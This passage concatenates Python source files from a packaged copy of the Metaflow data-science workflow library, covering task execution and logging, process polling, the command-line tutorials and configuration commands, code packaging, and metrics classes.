'ds_type': self._ds.TYPE,
'location': location,
'attempt': self.retries}),
type='log_path')]
self.metadata.register_metadata(self.run_id,
self.step,
self.task_id,
datum)
return location
def save_metadata(self, name, metadata):
self._ds.save_metadata(name, metadata)
def __str__(self):
return ' '.join(self._args)
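# Illustrative sketch of the pathspec-index key that Task._find_origin_task
# above uses to look up the matching task in the run being resumed: the task id
# is dropped and the lookup keys on run/step[foreach indices] instead. The
# helper and the example values are hypothetical.
def _origin_pathspec_index_sketch(clone_run_id, step_name, foreach_indices):
index = ','.join(str(i) for i in foreach_indices)
return '%s/%s[%s]' % (clone_run_id, step_name, index)
# e.g. _origin_pathspec_index_sketch('1580', 'train', [0, 2]) -> '1580/train[0,2]'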
class TaskFailed(MetaflowException):
headline = "Step failure"
def __init__(self, task, msg=''):
body = "Step *%s* (task-id %s) failed" % (task.step,
task.task_id)
if msg:
body = '%s: %s' % (body, msg)
else:
body += '.'
super(TaskFailed, self).__init__(body)
class TruncatedBuffer(object):
def __init__(self, name, maxsize):
self.name = name
self._maxsize = maxsize
self._buffer = BytesIO()
self._size = 0
self._eof = False
def write(self, bytedata, system_msg=False):
if system_msg:
self._buffer.write(bytedata)
elif not self._eof:
if self._size + len(bytedata) < self._maxsize:
self._buffer.write(bytedata)
self._size += len(bytedata)
else:
msg = b'[TRUNCATED - MAXIMUM LOG FILE SIZE REACHED]\n'
self._buffer.write(msg)
self._eof = True
def get_bytes(self):
return self._buffer.getvalue()
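# Minimal usage sketch for TruncatedBuffer (illustrative only): once user
# output would exceed maxsize the buffer records a single truncation marker and
# drops further user lines, while system messages are always appended.
def _truncated_buffer_sketch():
buf = TruncatedBuffer('stdout', 32)
buf.write(b'x' * 16)                            # fits, recorded as-is
buf.write(b'y' * 32)                            # would exceed 32 bytes -> marker
buf.write(b'[KILLED BY ORCHESTRATOR]\n', system_msg=True)  # always recorded
return buf.get_bytes()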
class CLIArgs(object):
"""
Container to allow decorators modify the command line parameters
for step execution in StepDecorator.runtime_step_cli().
"""
def __init__(self, task):
self.task = task
self.entrypoint = list(task.entrypoint)
self.top_level_options = {
'quiet': True,
'coverage': 'coverage' in sys.modules,
'metadata': self.task.metadata_type,
'environment': self.task.environment_type,
'datastore': self.task.datastore_type,
'event-logger': self.task.event_logger_type,
'monitor': self.task.monitor_type,
'datastore-root': self.task.datastore_sysroot,
'with': [deco.make_decorator_spec() for deco in self.task.decos
if not deco.statically_defined]
}
self.commands = ['step']
self.command_args = [self.task.step]
self.command_options = {
'run-id': task.run_id,
'task-id': task.task_id,
'input-paths': compress_list(task.input_paths),
'split-index': task.split_index,
'retry-count': task.retries,
'max-user-code-retries': task.user_code_retries,
'tag': task.tags,
'namespace': get_namespace() or ''
}
self.env = {}
def get_args(self):
def options(mapping):
for k, v in mapping.items():
values = v if isinstance(v, list) else [v]
for value in values:
if value:
yield '--%s' % k
if not isinstance(value, bool):
yield to_unicode(value)
args = list(self.entrypoint)
args.extend(options(self.top_level_options))
args.extend(self.commands)
args.extend(self.command_args)
args.extend(options(self.command_options))
return args
def get_env(self):
return self.env
def __str__(self):
return ' '.join(self.get_args())
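# Illustrative, standalone sketch of the flag-expansion rule CLIArgs.get_args()
# applies above: booleans become bare flags, lists repeat the option once per
# value, and falsy values are skipped entirely. The option names below are
# hypothetical.
def _cli_options_sketch(mapping):
for k, v in mapping.items():
values = v if isinstance(v, list) else [v]
for value in values:
if value:
yield '--%s' % k
if not isinstance(value, bool):
yield str(value)
# list(_cli_options_sketch({'quiet': True, 'tag': ['a', 'b'], 'split-index': None}))
# -> ['--quiet', '--tag', 'a', '--tag', 'b']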
class Worker(object):
def __init__(self, task, max_logs_size):
self.task = task
self._proc = self._launch()
if task.retries > task.user_code_retries:
self.task.log('Task fallback is starting to handle the failure.',
system_msg=True,
pid=self._proc.pid)
elif not task.is_cloned:
suffix = ' (retry).' if task.retries else '.'
self.task.log('Task is starting' + suffix,
system_msg=True,
pid=self._proc.pid)
self._stdout = TruncatedBuffer('stdout', max_logs_size)
self._stderr = TruncatedBuffer('stderr', max_logs_size)
self._logs = {self._proc.stderr.fileno(): (self._proc.stderr,
self._stderr),
self._proc.stdout.fileno(): (self._proc.stdout,
self._stdout)}
self._encoding = sys.stdout.encoding or 'UTF-8'
self.killed = False
def _launch(self):
args = CLIArgs(self.task)
env = dict(os.environ)
if self.task.clone_run_id:
args.command_options['clone-run-id'] = self.task.clone_run_id
if self.task.is_cloned and self.task.clone_origin:
args.command_options['clone-only'] = self.task.clone_origin
# disabling atlas sidecar for cloned tasks due to perf reasons
args.top_level_options['monitor'] = 'nullSidecarMonitor'
else:
# decorators may modify the CLIArgs object in-place
for deco in self.task.decos:
deco.runtime_step_cli(args,
self.task.retries,
self.task.user_code_retries)
env.update(args.get_env())
# the env vars are needed by the test framework, nothing else
env['_METAFLOW_ATTEMPT'] = str(self.task.retries)
if self.task.clone_run_id:
env['_METAFLOW_RESUMED_RUN'] = '1'
env['_METAFLOW_RESUME_ORIGIN_RUN_ID'] = str(self.task.clone_run_id)
# NOTE bufsize=1 below enables line buffering which is required
# by read_logline() below that relies on readline() not blocking
# print('running', args)
cmdline = args.get_args()
debug.subcommand_exec(cmdline)
return subprocess.Popen(cmdline,
env=env,
bufsize=1,
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE)
def write(self, msg, buf):
buf.write(msg)
text = msg.strip().decode(self._encoding, errors='replace')
self.task.log(text, pid=self._proc.pid)
def read_logline(self, fd):
fileobj, buf = self._logs[fd]
# readline() below should never block thanks to polling and
# line buffering. If it does, things will deadlock
line = fileobj.readline()
if line:
self.write(line, buf)
return True
else:
return False
def fds(self):
return (self._proc.stderr.fileno(),
self._proc.stdout.fileno())
def kill(self):
if not self.killed:
for fileobj, buf in self._logs.values():
buf.write(b'[KILLED BY ORCHESTRATOR]\n', system_msg=True)
try:
# wait for the process to clean up after itself
select.poll().poll(1000)
self._proc.kill()
except:
pass
self.killed = True
def terminate(self):
# this shouldn't block, since terminate() is called only
# after the poller has decided that the worker is dead
returncode = self._proc.wait()
# consume all remaining loglines
# we set the file descriptor to be non-blocking, since
# the pipe may stay active due to subprocesses launched by
# the worker, e.g. sidecars, so we can't rely on EOF. We try to
# read just what's available in the pipe buffer
for fileobj, buf in self._logs.values():
fileno = fileobj.fileno()
fcntl.fcntl(fileno, fcntl.F_SETFL, os.O_NONBLOCK)
try:
while self.read_logline(fileno):
pass
except:
# ignore "resource temporarily unavailable" etc. errors
# caused due to non-blocking. Draining is done on a
# best-effort basis.
pass
# Return early if the task is cloned since we don't want to
# perform any log collection.
if not self.task.is_cloned:
self.task.save_logs('stdout', self._stdout.get_bytes())
self.task.save_logs('stderr', self._stderr.get_bytes())
self.task.save_metadata('runtime', {'return_code': returncode,
'killed': self.killed,
'success': returncode == 0})
if returncode:
if not self.killed:
self.task.log('Task failed.',
system_msg=True,
pid=self._proc.pid)
else:
num = self.task.results['_foreach_num_splits']
if num:
self.task.log('Foreach yields %d child steps.' % num,
system_msg=True,
pid=self._proc.pid)
self.task.log('Task finished successfully.',
system_msg=True,
pid=self._proc.pid)
return returncode
def __str__(self):
return 'Worker[%d]: %s' % (self._proc.pid, self.task.path) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/runtime.py | runtime.py |
import platform
import select
class ProcPollEvent(object):
def __init__(self, fd, can_read=False, is_terminated=False):
self.fd = fd
self.can_read = can_read
self.is_terminated = is_terminated
class ProcPoll(object):
def poll(self):
raise NotImplementedError()
def add(self, fd):
raise NotImplementedError()
def remove(self, fd):
raise NotImplementedError()
class LinuxProcPoll(ProcPoll):
def __init__(self):
self._poll = select.poll()
def add(self, fd):
self._poll.register(fd, select.POLLIN |
select.POLLERR |
select.POLLHUP)
def remove(self, fd):
self._poll.unregister(fd)
def poll(self, timeout):
for (fd, event) in self._poll.poll(timeout):
yield ProcPollEvent(fd=fd,
can_read=bool(event & select.POLLIN),
is_terminated=bool(event & select.POLLHUP) or
bool(event & select.POLLERR))
class DarwinProcPoll(ProcPoll):
def __init__(self):
self._kq = select.kqueue()
def add(self, fd):
ev = select.kevent(fd,
filter=select.KQ_FILTER_READ,
flags=select.KQ_EV_ADD)
self._kq.control([ev], 0, 0)
def remove(self, fd):
ev = select.kevent(fd,
flags=select.KQ_EV_DELETE)
self._kq.control([ev], 0, 0)
def poll(self, timeout):
for event in self._kq.control(None, 100, timeout):
yield ProcPollEvent(fd=event.ident,
can_read=True,
is_terminated=event.flags & select.KQ_EV_EOF)
def make_poll():
os = platform.system()
if os == 'Linux':
return LinuxProcPoll()
elif os == 'Darwin':
return DarwinProcPoll()
else:
raise Exception("Polling is not supported on "
"your operating system (%s)" % os)
if __name__ == '__main__':
import subprocess
p1 = subprocess.Popen(['bash', '-c',
'for ((i=0;i<10;i++)); '
'do echo "first $i"; sleep 1; done'],
bufsize=1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
p2 = subprocess.Popen(['bash', '-c',
'for ((i=0;i<5;i++)); '
'do echo "second $i"; sleep 2; done'],
bufsize=1,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
fds = {p1.stdout.fileno(): ('p1', p1.stdout),
p2.stdout.fileno(): ('p2', p2.stdout)}
poll = make_poll()
print('poller is %s' % poll)
for fd in fds:
poll.add(fd)
n = 2
while n > 0:
for event in poll.poll(0.5):
name, fileobj = fds[event.fd]
print('[%s] %s' % (name, fileobj.readline().strip()))
if event.is_terminated:
print('[%s] terminated' % name)
poll.remove(event.fd)
n -= 1 | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/procpoll.py | procpoll.py |
import click
import json
import os
import shutil
from os.path import expanduser
from metaflow.datastore.local import LocalDataStore
from metaflow.metaflow_config import DATASTORE_LOCAL_DIR, DEFAULT_METADATA
def makedirs(path):
# This is for python2 compatibility.
# Python3 has os.makedirs(exist_ok=True).
try:
os.makedirs(path)
except OSError as x:
if x.errno == 17:
return
else:
raise
def echo_dev_null(*args, **kwargs):
pass
def echo_always(line, **kwargs):
click.secho(line, **kwargs)
@click.group(invoke_without_command=True)
@click.pass_context
def main(ctx):
global echo
echo = echo_always
import metaflow
echo('Metaflow ',
fg='magenta',
bold=True,
nl=False)
if ctx.invoked_subcommand is None:
echo('(%s): ' % metaflow.__version__,
fg='magenta',
bold=False,
nl=False)
else:
echo('(%s)\n' % metaflow.__version__,
fg='magenta',
bold=False)
if ctx.invoked_subcommand is None:
echo("More data science, less engineering\n",
fg='magenta')
# metaflow URL
echo('http://docs.metaflow.org', fg='cyan', nl=False)
echo(' - Find the documentation')
# metaflow chat
echo('http://chat.metaflow.org', fg='cyan', nl=False)
echo(' - Chat with us')
# metaflow help email
echo('[email protected]', fg='cyan', nl=False)
echo(' - Get help by email\n')
# print a short list of next steps.
short_help = {'tutorials': 'Browse and access metaflow tutorials.',
'configure': 'Configure metaflow to run remotely.',
'status': 'Display the current working tree.',
'help': 'Shows all available commands to run.'}
echo('Commands:', bold=False)
for cmd, desc in short_help.items():
echo(' metaflow {0:<10} '.format(cmd),
fg='cyan',
bold=False,
nl=False)
echo('%s' % desc)
@main.command(help='Show all available commands.')
@click.pass_context
def help(ctx):
print(ctx.parent.get_help())
@main.command(help='Shows flows accessible from the current working tree.')
def status():
from metaflow.client import get_metadata
res = get_metadata()
if res:
res = res.split('@')
else:
raise click.ClickException('Unknown status: cannot find a Metadata provider')
if res[0] == 'service':
echo('Using Metadata provider at: ', nl=False)
echo('"%s"\n' % res[1], fg='cyan')
echo('To list available flows, type:\n')
echo('1. python')
echo('2. from metaflow import Metaflow')
echo('3. list(Metaflow())')
return
from metaflow.client import namespace, metadata, Metaflow
# Get the local data store path
path = LocalDataStore.get_datastore_root_from_config(echo,
create_on_absent=False)
# Throw an exception
if path is None:
raise click.ClickException("Could not find " +\
click.style('"%s"' % DATASTORE_LOCAL_DIR,
fg='red') +\
" in the current working tree.")
stripped_path = os.path.dirname(path)
namespace(None)
metadata('local@%s' % stripped_path)
echo('Working tree found at: ', nl=False)
echo('"%s"\n' % stripped_path, fg='cyan')
echo('Available flows:', fg='cyan', bold=True)
for flow in Metaflow():
echo('* %s' % flow, fg='cyan')
@main.group(help="Browse and access the metaflow tutorial episodes.")
def tutorials():
pass
def get_tutorials_dir():
metaflow_dir = os.path.dirname(__file__)
package_dir = os.path.dirname(metaflow_dir)
tutorials_dir = os.path.join(package_dir, 'metaflow', 'tutorials')
return tutorials_dir
def get_tutorial_metadata(tutorial_path):
metadata = {}
with open(os.path.join(tutorial_path, 'README.md')) as readme:
content = readme.read()
paragraphs = [paragraph.strip() \
for paragraph \
in content.split('#') if paragraph]
metadata['description'] = paragraphs[0].split('**')[1]
header = paragraphs[0].split('\n')
header = header[0].split(':')
metadata['episode'] = header[0].strip()[len('Episode '):]
metadata['title'] = header[1].strip()
for paragraph in paragraphs[1:]:
if paragraph.startswith('Before playing'):
lines = '\n'.join(paragraph.split('\n')[1:])
metadata['prereq'] = lines.replace('```', '')
if paragraph.startswith('Showcasing'):
lines = '\n'.join(paragraph.split('\n')[1:])
metadata['showcase'] = lines.replace('```', '')
if paragraph.startswith('To play'):
lines = '\n'.join(paragraph.split('\n')[1:])
metadata['play'] = lines.replace('```', '')
return metadata
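# Illustrative sketch (hypothetical README.md contents) of the layout that
# get_tutorial_metadata() above assumes: the file is split on '#', the first
# section carries "Episode NN: Title" and a **description**, and later sections
# start with "Before playing", "Showcasing" or "To play".
#
#   # Episode 01: Playlist
#   **Build a movie playlist from static data.**
#   # Showcasing
#   Basic artifacts and self.next() transitions.
#   # To play
#   python 01-playlist/playlist.py run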
def get_all_episodes():
episodes = []
for name in sorted(os.listdir(get_tutorials_dir())):
# Skip hidden files (like .gitignore)
if not name.startswith('.'):
episodes.append(name)
return episodes
@tutorials.command(help="List the available episodes.")
def list():
echo('Episodes:', fg='cyan', bold=True)
for name in get_all_episodes():
path = os.path.join(get_tutorials_dir(), name)
metadata = get_tutorial_metadata(path)
echo('* {0: <20} '.format(metadata['episode']),
fg='cyan',
nl=False)
echo('- {0}'.format(metadata['title']))
echo('\nTo pull the episodes, type: ')
echo('metaflow tutorials pull', fg='cyan')
def validate_episode(episode):
src_dir = os.path.join(get_tutorials_dir(), episode)
if not os.path.isdir(src_dir):
raise click.BadArgumentUsage("Episode " + \
click.style("\"{0}\"".format(episode),
fg='red') + " does not exist."\
" To see a list of available episodes, "\
"type:\n" + \
click.style("metaflow tutorials list",
fg='cyan'))
def autocomplete_episodes(ctx, args, incomplete):
return [k for k in get_all_episodes() if incomplete in k]
@tutorials.command(help="Pull episodes "\
"into your current working directory.")
@click.option('--episode', default="", help="Optional episode name "\
"to pull only a single episode.")
def pull(episode):
tutorials_dir = get_tutorials_dir()
if not episode:
episodes = get_all_episodes()
else:
episodes = [episode]
# Validate that the list is valid.
for episode in episodes:
validate_episode(episode)
# Create destination `metaflow-tutorials` dir.
dst_parent = os.path.join(os.getcwd(), 'metaflow-tutorials')
makedirs(dst_parent)
# Pull specified episodes.
for episode in episodes:
dst_dir = os.path.join(dst_parent, episode)
# Check if episode has already been pulled before.
if os.path.exists(dst_dir):
if click.confirm("Episode " + \
click.style("\"{0}\"".format(episode), fg='red') +\
" has already been pulled before. Do you wish "\
"to delete the existing version?"):
shutil.rmtree(dst_dir)
else:
continue
echo('Pulling episode ', nl=False)
echo('\"{0}\"'.format(episode), fg='cyan', nl=False)
# TODO: Is the following redundant?
echo(' into your current working directory.')
# Copy from (local) metaflow package dir to current.
src_dir = os.path.join(tutorials_dir, episode)
shutil.copytree(src_dir, dst_dir)
echo('\nTo know more about an episode, type:\n', nl=False)
echo('metaflow tutorials info [EPISODE]', fg='cyan')
@tutorials.command(help='Find out more about an episode.')
@click.argument('episode', autocompletion=autocomplete_episodes)
def info(episode):
validate_episode(episode)
src_dir = os.path.join(get_tutorials_dir(), episode)
metadata = get_tutorial_metadata(src_dir)
echo('Synopsis:', fg='cyan', bold=True)
echo('%s' % metadata['description'])
echo('\nShowcasing:', fg='cyan', bold=True, nl=True)
echo('%s' % metadata['showcase'])
if 'prereq' in metadata:
echo('\nBefore playing:', fg='cyan', bold=True, nl=True)
echo('%s' % metadata['prereq'])
echo('\nTo play:', fg='cyan', bold=True)
echo('%s' % metadata['play'])
# NOTE: This code needs to be in sync with metaflow/metaflow_config.py.
METAFLOW_CONFIGURATION_DIR =\
expanduser(os.environ.get('METAFLOW_HOME', '~/.metaflowconfig'))
@main.group(help="Configure Metaflow to "\
"run on our sandbox or an AWS account.")
def configure():
makedirs(METAFLOW_CONFIGURATION_DIR)
def get_config_path(profile):
config_file = 'config.json' if not profile else ('config_%s.json' % profile)
path = os.path.join(METAFLOW_CONFIGURATION_DIR, config_file)
return path
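# Illustrative examples of the mapping above (paths assume the default
# METAFLOW_HOME of ~/.metaflowconfig):
# get_config_path('')    -> ~/.metaflowconfig/config.json
# get_config_path('dev') -> ~/.metaflowconfig/config_dev.json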
def prompt_config_overwrite(profile):
path = get_config_path(profile)
if os.path.exists(path):
if click.confirm('Do you wish to overwrite the existing configuration '
'in ' + click.style('"%s"' % path, fg='cyan') + '?',
abort=True):
return
def persist_env(env_dict, profile):
# TODO: Should we persist empty env_dict or notify user differently?
path = get_config_path(profile)
with open(path, 'w') as f:
json.dump(env_dict, f)
echo('\nConfiguration successfully written to ', nl=False)
echo('"%s"' % path, fg='cyan')
@configure.command(help='Resets the configuration to run locally.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def reset(profile):
path = get_config_path(profile)
if os.path.exists(path):
if click.confirm('Do you really wish to reset the configuration in ' +\
click.style('"%s"' % path, fg='cyan'), abort=True):
os.remove(path)
echo('Configuration successfully reset to run locally.')
else:
echo('Configuration is already reset to run locally.')
@configure.command(help='Shows the existing configuration.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def show(profile):
path = get_config_path(profile)
env_dict = {}
if os.path.exists(path):
with open(path, 'r') as f:
env_dict = json.load(f)
if env_dict:
echo('Showing configuration in ', nl=False)
echo('"%s"\n' % path, fg='cyan')
for k,v in env_dict.items():
echo('%s=%s' % (k, v))
else:
echo('Configuration is set to run locally.')
@configure.command(help='Get Metaflow up and running on our sandbox.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def sandbox(profile):
prompt_config_overwrite(profile)
# Prompt for user input.
encoded_str = click.prompt('Following instructions from '
'https://metaflow.org/sandbox, '
'please paste the encoded magic string',
type=str)
# Decode the bytes to env_dict.
try:
import base64, zlib
from metaflow.util import to_bytes
env_dict =\
json.loads(zlib.decompress(base64.b64decode(to_bytes(encoded_str))))
except:
# TODO: Add the URL for contact us page in the error?
raise click.BadArgumentUsage('Could not decode the sandbox '\
'configuration. Please contact us.')
# Persist to a file.
persist_env(env_dict, profile)
@configure.command(help='Get Metaflow up and running on your own AWS environment.')
@click.option('--profile', '-p', default='',
help="Optional user profile to allow storing multiple "
"configurations. Please `export METAFLOW_PROFILE` to "
"switch between profile configuration(s).")
def aws(profile):
prompt_config_overwrite(profile)
if click.confirm('Have you setup your ' +\
click.style('AWS credentials?', fg='cyan')):
env_dict = {}
# Datastore configuration.
use_s3 = click.confirm('\nDo you want to use AWS S3 as your datastore?',
default=True, abort=False)
if use_s3:
echo('\tAWS S3', fg='cyan')
datastore_s3_root =\
click.prompt('\tPlease enter the bucket prefix to use for your '
'flows')
datatools_s3_root =\
click.prompt('\tPlease enter the bucket prefix to use for your '
'data',
default='%s/data' % datastore_s3_root)
env_dict['METAFLOW_DEFAULT_DATASTORE'] = 's3'
env_dict['METAFLOW_DATASTORE_SYSROOT_S3'] = datastore_s3_root
env_dict['METAFLOW_DATATOOLS_SYSROOT_S3'] = datatools_s3_root
# Batch configuration (only if S3 is being used).
use_batch =\
click.confirm('\nDo you want to use AWS Batch for compute?',
default=True, abort=False)
if use_batch:
echo('\n\tAWS Batch', fg='cyan')
job_queue = click.prompt('\tPlease enter the job queue to use '
'for batch')
default_image =\
click.prompt('\tPlease enter the default container image '
'to use')
container_registry =\
click.prompt('\tPlease enter the container registry')
ecs_s3_role =\
click.prompt('\tPlease enter the IAM role to use for the '
'container to get AWS S3 access')
env_dict['METAFLOW_BATCH_JOB_QUEUE'] = job_queue
env_dict['METAFLOW_BATCH_CONTAINER_IMAGE'] = default_image
env_dict['METAFLOW_BATCH_CONTAINER_REGISTRY'] =\
container_registry
env_dict['METAFLOW_ECS_S3_ACCESS_IAM_ROLE'] = ecs_s3_role
# Metadata service configuration.
use_metadata = click.confirm('\nDo you want to use a (remote) metadata '
'service?', default=True, abort=False)
if use_metadata:
echo('\tMetadata service', fg='cyan')
service_url = click.prompt('\tPlease enter the URL for your '
'metadata service')
env_dict['METAFLOW_DEFAULT_METADATA'] = 'service'
env_dict['METADATA_SERVICE_URL'] = service_url
# Conda (on S3) configuration.
if use_s3:
use_conda = click.confirm('\nDo you want to use conda for '
'dependency management?',
default=True, abort=False)
if use_conda:
echo('\tConda on AWS S3', fg='cyan')
default_val =\
'%s/conda' % env_dict['METAFLOW_DATASTORE_SYSROOT_S3']
package_s3root = \
click.prompt('\tPlease enter the bucket prefix for storing '
'conda packages',
default=default_val)
env_dict['METAFLOW_CONDA_PACKAGE_S3ROOT'] = package_s3root
persist_env(env_dict, profile)
else:
echo('\nPlease set them up first through ', nl=False)
echo('"https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-configure.html"',
fg='cyan') | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/main_cli.py | main_cli.py |
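# Illustrative sketch of the JSON document that the `aws` command above ends up
# persisting via persist_env() when every prompt is accepted (the bucket, queue,
# image, registry, role and URL values below are hypothetical):
#
# {
#   "METAFLOW_DEFAULT_DATASTORE": "s3",
#   "METAFLOW_DATASTORE_SYSROOT_S3": "s3://my-bucket/metaflow",
#   "METAFLOW_DATATOOLS_SYSROOT_S3": "s3://my-bucket/metaflow/data",
#   "METAFLOW_BATCH_JOB_QUEUE": "my-job-queue",
#   "METAFLOW_BATCH_CONTAINER_IMAGE": "python:3.7",
#   "METAFLOW_BATCH_CONTAINER_REGISTRY": "docker.io",
#   "METAFLOW_ECS_S3_ACCESS_IAM_ROLE": "my-s3-access-role",
#   "METAFLOW_DEFAULT_METADATA": "service",
#   "METADATA_SERVICE_URL": "https://example.com/metadata",
#   "METAFLOW_CONDA_PACKAGE_S3ROOT": "s3://my-bucket/metaflow/conda"
# }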
import os
import sys
import tarfile
import json
from hashlib import sha1
from itertools import chain
from .util import to_unicode
try:
# python2
import cStringIO
BytesIO = cStringIO.StringIO
except:
# python3
import io
BytesIO = io.BytesIO
DEFAULT_SUFFIXES = ['.py']
class MetaflowPackage(object):
def __init__(self, flow, environment, logger, suffixes=DEFAULT_SUFFIXES):
self.suffixes = list(set().union(suffixes, DEFAULT_SUFFIXES))
self.environment = environment
self.metaflow_root = os.path.dirname(__file__)
environment.init_environment(logger)
for step in flow:
for deco in step.decorators:
deco.package_init(flow,
step.__name__,
environment)
self.blob, self.sha = self._make()
def _walk(self, root, exclude_hidden=True):
root = to_unicode(root) # handle files/folder with non ascii chars
prefixlen = len('%s/' % os.path.dirname(root))
for path, dirs, files in os.walk(root):
if exclude_hidden and '/.' in path:
continue
# path = path[2:] # strip the ./ prefix
# if path and (path[0] == '.' or './' in path):
# continue
for fname in files:
if fname[0] == '.':
continue
if any(fname.endswith(suffix) for suffix in self.suffixes):
p = os.path.join(path, fname)
yield p, p[prefixlen:]
def path_tuples(self):
"""
Returns list of (path, arcname) to be added to the job package, where
`arcname` is the alternative name for the file in the package.
"""
# We want the following contents in the tarball
# Metaflow package itself
for path_tuple in self._walk(self.metaflow_root, exclude_hidden=False):
yield path_tuple
# the package folders for environment
for path_tuple in self.environment.add_to_package():
yield path_tuple
# the user's working directory
flowdir = os.path.dirname(os.path.abspath(sys.argv[0])) + '/'
for path_tuple in self._walk(flowdir):
yield path_tuple
def _add_info(self, tar):
info = tarfile.TarInfo('INFO')
env = self.environment.get_environment_info()
buf = BytesIO()
buf.write(json.dumps(env).encode('utf-8'))
buf.seek(0)
info.size = len(buf.getvalue())
tar.addfile(info, buf)
def _make(self):
def no_mtime(tarinfo):
# a modification time change should not change the hash of
# the package. Only content modifications will.
tarinfo.mtime = 0
return tarinfo
buf = BytesIO()
with tarfile.TarFile(fileobj=buf, mode='w') as tar:
self._add_info(tar)
for path, arcname in self.path_tuples():
tar.add(path, arcname=arcname,
recursive=False, filter=no_mtime)
blob = buf.getvalue()
return blob, sha1(blob).hexdigest()
def __str__(self):
return '<code package %s>' % self.sha | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/package.py | package.py |
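# Minimal inspection sketch (illustrative; not used by the packager above):
# list the members of a built code package and read back its INFO record.
# `pkg` is assumed to be a MetaflowPackage instance.
def _inspect_package_sketch(pkg):
import io
with tarfile.open(fileobj=io.BytesIO(pkg.blob), mode='r') as tar:
names = tar.getnames()
info = json.loads(tar.extractfile('INFO').read().decode('utf-8'))
return names, info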
import time
from contextlib import contextmanager
from .sidecar import SidecarSubProcess
from .sidecar_messages import Message, MessageTypes
COUNTER_TYPE = "COUNTER"
GAUGE_TYPE = "GAUGE"
MEASURE_TYPE = "MEASURE"
TIMER_TYPE = "TIMER"
class Monitor(object):
def __init__(self, monitor_type, env, flow_name):
# type: (str) -> None
self.sidecar_process = None
self.monitor_type = monitor_type
self.env_info = env.get_environment_info()
self.env_info["flow_name"] = flow_name
def start(self):
if self.sidecar_process is None:
self.sidecar_process = SidecarSubProcess(self.monitor_type)
@contextmanager
def count(self, name,):
if self.sidecar_process is not None:
counter = Counter(name, self.env_info)
counter.increment()
payload = {
'counter': counter.to_dict()
}
msg = Message(MessageTypes.LOG_EVENT, payload)
yield
self.sidecar_process.msg_handler(msg)
else:
yield
@contextmanager
def measure(self, name):
if self.sidecar_process is not None:
timer = Timer(name + "_timer", self.env_info)
counter = Counter(name + "_counter", self.env_info)
timer.start()
counter.increment()
yield
timer.end()
payload = {
'counter': counter.to_dict(),
'timer': timer.to_dict()
}
msg = Message(MessageTypes.LOG_EVENT, payload)
self.sidecar_process.msg_handler(msg)
else:
yield
def gauge(self, gauge):
if self.sidecar_process is not None:
payload = {
'gauge': gauge.to_dict()
}
msg = Message(MessageTypes.LOG_EVENT, payload)
self.sidecar_process.msg_handler(msg)
def terminate(self):
if self.sidecar_process is not None:
self.sidecar_process.kill()
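# Minimal usage sketch for Monitor (illustrative; the monitor type string and
# the `env` object are hypothetical -- `env` only needs to provide
# get_environment_info() as assumed above):
#
#   monitor = Monitor('debugMonitor', env, 'MyFlow')
#   monitor.start()
#   with monitor.measure('persist'):
#       pass   # timed and counted work goes here
#   monitor.gauge(Gauge('queue_depth', monitor.env_info))
#   monitor.terminate()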
class Metric(object):
"""
Abstract base class
"""
def __init__(self, type, env):
self._env = env
self._type = type
@property
def name(self):
raise NotImplementedError()
@property
def flow_name(self):
return self._env['flow_name']
@property
def env(self):
return self._env
@property
def value(self):
raise NotImplementedError()
def set_env(self, env):
self._env = env
def to_dict(self):
return {
'_env': self._env,
'_type': self._type,
}
class Timer(Metric):
def __init__(self, name, env):
super(Timer, self).__init__(TIMER_TYPE, env)
self._name = name
self._start = 0
self._end = 0
@property
def name(self):
return self._name
def start(self):
self._start = time.time()
def end(self):
self._end = time.time()
def set_start(self, start):
self._start = start
def set_end(self, end):
self._end = end
def get_duration(self):
return self._end - self._start
@property
def value(self):
return (self._end - self._start) * 1000
def to_dict(self):
parent_dict = super(Timer, self).to_dict()
parent_dict['_name'] = self.name
parent_dict['_start'] = self._start
parent_dict['_end'] = self._end
return parent_dict
class Counter(Metric):
def __init__(self, name, env):
super(Counter, self).__init__(COUNTER_TYPE, env)
self._name = name
self._count = 0
@property
def name(self):
return self._name
def increment(self):
self._count += 1
def set_count(self, count):
self._count = count
@property
def value(self):
return self._count
def to_dict(self):
parent_dict = super(Counter, self).to_dict()
parent_dict['_name'] = self.name
parent_dict['_count'] = self._count
return parent_dict
class Gauge(Metric):
def __init__(self, name, env):
super(Gauge, self).__init__(GAUGE_TYPE, env)
self._name = name
self._value = 0
@property
def name(self):
return self._name
def set_value(self, val):
self._value = val
def increment(self):
self._value += 1
@property
def value(self):
return self._value
def to_dict(self):
parent_dict = super(Gauge, self).to_dict()
parent_dict['_name'] = self.name
parent_dict['_value'] = self.value
return parent_dict
def deserialize_metric(metrics_dict):
if metrics_dict is None:
return
type = metrics_dict.get('_type')
name = metrics_dict.get('_name')
if type == COUNTER_TYPE:
try:
counter = Counter(name, None)
counter.set_env(metrics_dict.get('_env'))
except Exception as ex:
return
counter.set_count(metrics_dict.get('_count'))
return counter
elif type == TIMER_TYPE:
timer = Timer(name, None)
timer.set_start(metrics_dict.get('_start'))
timer.set_end(metrics_dict.get('_end'))
timer.set_env(metrics_dict.get('_env'))
return timer
elif type == GAUGE_TYPE:
gauge = Gauge(name, None)
gauge.set_env(metrics_dict.get('_env'))
gauge.set_value(metrics_dict.get('_value'))
return gauge
else:
raise NotImplementedError("UNSUPPORTED MESSAGE TYPE IN MONITOR")
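# Illustrative round-trip sketch: metrics cross the sidecar boundary as plain
# dicts (Metric.to_dict) and are rebuilt on the receiving side with
# deserialize_metric above. The metric name and env payload are hypothetical.
def _metric_roundtrip_sketch():
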